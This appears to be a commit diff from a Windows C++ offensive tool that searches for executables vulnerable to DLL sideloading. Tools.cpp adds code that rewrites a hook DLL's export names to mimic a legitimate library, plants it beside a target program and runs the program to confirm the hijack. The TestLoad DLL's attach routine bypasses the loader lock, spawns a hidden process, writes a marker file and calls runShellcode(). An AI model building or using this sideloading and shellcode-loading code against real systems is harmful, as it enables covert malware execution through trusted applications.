STRLCPY/SearchAvailableExe

代码备份
maoku committed 2 months ago

0b96b9a3

1 parent 3db02eff

■ ■ ■ ■ ■ ■

SearchAvailableExe/SearchAvailableExe.vcxproj.user

1	1		<?xml version="1.0" encoding="utf-8"?>
2	2		<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	3		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
4		-	<LocalDebuggerCommandArguments>
5		-	</LocalDebuggerCommandArguments>
	4	+	<LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
6	5		<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
7	6		</PropertyGroup>
8	7		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
9		-	<LocalDebuggerCommandArguments>
10		-	</LocalDebuggerCommandArguments>
	8	+	<LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
11	9		<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
12	10		</PropertyGroup>
13	11		</Project>

■ ■ ■ ■ ■ ■ ■

SearchAvailableExe/Tools.cpp

		skipped 671 lines
672	672		return 0;
673	673		}
674	674
	675	+	bool fixExportTable(string targetFilePath, string sourceFilePath) {
	676	+	char* targetBuffer;
	677	+	DWORD fileSize = readFileContext(targetFilePath, &targetBuffer);
	678	+
	679	+	PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)targetBuffer;
	680	+	PIMAGE_NT_HEADERS pNtH = (PIMAGE_NT_HEADERS)((DWORD)pDH + pDH->e_lfanew);
	681	+	PIMAGE_OPTIONAL_HEADER pOH = &pNtH->OptionalHeader;
	682	+	IMAGE_DATA_DIRECTORY exportDirectory;
	683	+
	684	+	if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC)
	685	+	{
	686	+	PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
	687	+	PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
	688	+
	689	+	exportDirectory = pOH32->DataDirectory[0];
	690	+	}
	691	+	else {
	692	+	PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
	693	+	PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
	694	+
	695	+	exportDirectory = pOH64->DataDirectory[0];
	696	+	}
	697	+
	698	+	IMAGE_EXPORT_DIRECTORY* exportDir = (IMAGE_EXPORT_DIRECTORY*)(targetBuffer + rvaToFOA(targetBuffer, exportDirectory.VirtualAddress));
	699	+
	700	+	DWORD* nameRVAs = (DWORD*)(targetBuffer + rvaToFOA(targetBuffer, exportDir->AddressOfNames));
	701	+
	702	+	char* sourceBuffer;
	703	+	readFileContext(sourceFilePath, &sourceBuffer);
	704	+
	705	+	pDH = (PIMAGE_DOS_HEADER)sourceBuffer;
	706	+	pNtH = (PIMAGE_NT_HEADERS)((size_t)pDH + pDH->e_lfanew);
	707	+	pOH = &pNtH->OptionalHeader;
	708	+
	709	+	if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC)
	710	+	{
	711	+	PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
	712	+	PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
	713	+
	714	+	exportDirectory = pOH32->DataDirectory[0];
	715	+	}
	716	+	else {
	717	+	PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
	718	+	PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
	719	+
	720	+	exportDirectory = pOH64->DataDirectory[0];
	721	+	}
	722	+
	723	+	IMAGE_EXPORT_DIRECTORY* exportDir_source = (IMAGE_EXPORT_DIRECTORY*)(sourceBuffer + rvaToFOA(sourceBuffer, exportDirectory.VirtualAddress));
	724	+
	725	+	DWORD* nameRVAs_source = (DWORD*)(sourceBuffer + rvaToFOA(sourceBuffer, exportDir_source->AddressOfNames));
	726	+
	727	+	if (exportDir_source->NumberOfNames > 100) {
	728	+	delete[] targetBuffer;
	729	+	delete[] sourceBuffer;
	730	+	return false;
	731	+	}
	732	+
	733	+	for (int i = 0; i < exportDir_source->NumberOfNames; i++)
	734	+	{
	735	+	DWORD nameRVA_source = nameRVAs_source[i];
	736	+	char* exportFunctionName_source = sourceBuffer + rvaToFOA(sourceBuffer, nameRVA_source);
	737	+
	738	+	DWORD nameRVA = nameRVAs[i];
	739	+	char* exportFunctionName = targetBuffer + rvaToFOA(targetBuffer, nameRVA);
	740	+
	741	+	memcpy(exportFunctionName, exportFunctionName_source, strlen(exportFunctionName_source) + 1);
	742	+	}
	743	+
	744	+	saveFile(targetFilePath, targetBuffer, fileSize);
	745	+
	746	+	delete[] targetBuffer;
	747	+	delete[] sourceBuffer;
	748	+
	749	+	return true;
	750	+	}
	751	+
675	752		std::string GetCurrentPath() {
676	753		char buffer[MAX_PATH];
677	754		GetModuleFileNameA(NULL, buffer, MAX_PATH);
		skipped 90 lines
768	845		return true;
769	846		}
770	847
771		-	int TestCreateProcess(string runFilePath) {
772		-	// 定义进程信息结构体
	848	+	int TestCreateProcess(string runFilePath, DWORD dwMilliseconds) {
773	849		STARTUPINFOA si = { sizeof(si) };
774	850		PROCESS_INFORMATION pi;
775	851
776		-	// 创建进程
777	852		if (!CreateProcessA(
778	853		nullptr, // 指向可执行文件名的指针（在这里，nullptr表示使用当前可执行文件）
779	854		(char*)runFilePath.c_str(), // 可执行文件的路径
		skipped 9 lines
789	864		}
790	865
791	866		// 等待进程结束
792		-	WaitForSingleObject(pi.hProcess, 500);
	867	+	WaitForSingleObject(pi.hProcess, dwMilliseconds);
793	868
794	869		TerminateProcess(pi.hProcess, 0);
795	870
		skipped 31 lines
827	902		exitCode++;
828	903		}
829	904
830		-	DWORD retExitCode = TestCreateProcess(runFilePath);
	905	+	DWORD retExitCode = TestCreateProcess(runFilePath, 500);
831	906		result->exploitDllPath = hookDllMap[retExitCode];
832	907
833		-	while(!DeleteDirectory(folderPath.c_str())){}
	908	+	if (result->exploitDllPath != "") {
	909	+	string hookFilePath = currentPath + "\\TestLoad_x86.dll";
	910	+	if (result->bit == 64)
	911	+	hookFilePath = currentPath + "\\TestLoad_x64.dll";
	912	+
	913	+	string targetFilePath = folderPath + "\\" + result->exploitDllPath;
	914	+	CopyFileA(hookFilePath.c_str(), targetFilePath.c_str(), FALSE);
	915	+	bool isSucc = fixExportTable(targetFilePath, result->fileDir + result->exploitDllPath);
	916	+
	917	+	if (isSucc) {
	918	+	targetFilePath = folderPath + "\\" + result->filePath.substr(result->filePath.find_last_of("\\/") + 1);
	919	+
	920	+	TestCreateProcess(targetFilePath, 3000);
	921	+	}
	922	+
	923	+	if (!std::filesystem::exists(folderPath + "\\test.txt"))
	924	+	result->exploitDllPath = "";
	925	+	}
	926	+
	927	+	while (!DeleteDirectory(folderPath.c_str())) {}
834	928		}

■ ■ ■ ■ ■ ■

TestLoad/TestLoad.vcxproj

		skipped 70 lines
71	71		</ImportGroup>
72	72		<PropertyGroup Label="UserMacros" />
73	73		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
74		-	<TargetName>dbgeng</TargetName>
	74	+	<TargetName>$(ProjectName)</TargetName>
75	75		</PropertyGroup>
76	76		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
77		-	<TargetName>dbgeng</TargetName>
	77	+	<TargetName>$(ProjectName)</TargetName>
78	78		</PropertyGroup>
79	79		<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
80	80		<ClCompile>
		skipped 58 lines
139	139		<ConformanceMode>false</ConformanceMode>
140	140		<PrecompiledHeader>NotUsing</PrecompiledHeader>
141	141		<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
142		-	<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
	142	+	<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
143	143		<Optimization>Disabled</Optimization>
144	144		<WholeProgramOptimization>false</WholeProgramOptimization>
145	145		</ClCompile>
		skipped 19 lines

■ ■ ■ ■ ■ ■

TestLoad/TestLoad.vcxproj.user

1	1		<?xml version="1.0" encoding="utf-8"?>
2	2		<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3		-	<PropertyGroup />
	3	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
	4	+	<LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
	5	+	<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
	6	+	</PropertyGroup>
4	7		</Project>

■ ■ ■ ■ ■ ■

TestLoad/dllmain.cpp

1	1		#include <Windows.h>
2		-	#include <stdio.h>
	2	+	#include <fstream>
3	3
4	4		#include "export.hpp"
5	5
		skipped 227 lines
233	233
234	234		#ifdef _WIN64
235	235		unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00};
236		-	unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35};
	236	+	unsigned char win7_lock_count_flag[] = {0xF0, 0x44, 0x0F, 0xB1, 0x35, 0xFF, 0xFF, 0xFF, 0xFF, 0x41};
237	237		#else
238	238		unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8};
239	239		unsigned char win7_lock_count_flag[] = {0xC7, 0x45, 0xFC, 0xFE, 0xFF, 0xFF, 0xFF, 0xBB, 0xFF, 0xFF, 0xFF, 0xFF, 0x8B, 0x75, 0xD8};
		skipped 66 lines
306	306		{
307	307		case DLL_PROCESS_ATTACH:
308	308		UNLOOK();
	309	+
	310	+	STARTUPINFOA si = { sizeof(si) };
	311	+	PROCESS_INFORMATION pi;
	312	+
	313	+	CreateProcessA(nullptr, (char*)"notepad.exe", nullptr, nullptr, FALSE, CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi);
	314	+
	315	+	TerminateProcess(pi.hProcess, 0);
	316	+
	317	+	char buffer[MAX_PATH];
	318	+	GetModuleFileNameA(NULL, buffer, MAX_PATH);
	319	+	std::string::size_type pos = std::string(buffer).find_last_of("\\/");
	320	+	std::string currentPath = std::string(buffer).substr(0, pos);
	321	+
	322	+	std::ofstream outputFile(currentPath + "\\test.txt");
309	323
310	324		runShellcode();
311	325		}
		skipped 3 lines

■ ■ ■ ■ ■ ■

TestLoad/export.hpp

1		-	extern "C" __declspec(dllexport) int DebugCreate() {
	1	+	extern "C" __declspec(dllexport) int TestLoad__________________________________________________________________________________________________1() {
2	2		return 1;
3	3		}
4	4
		skipped 395 lines

代码备份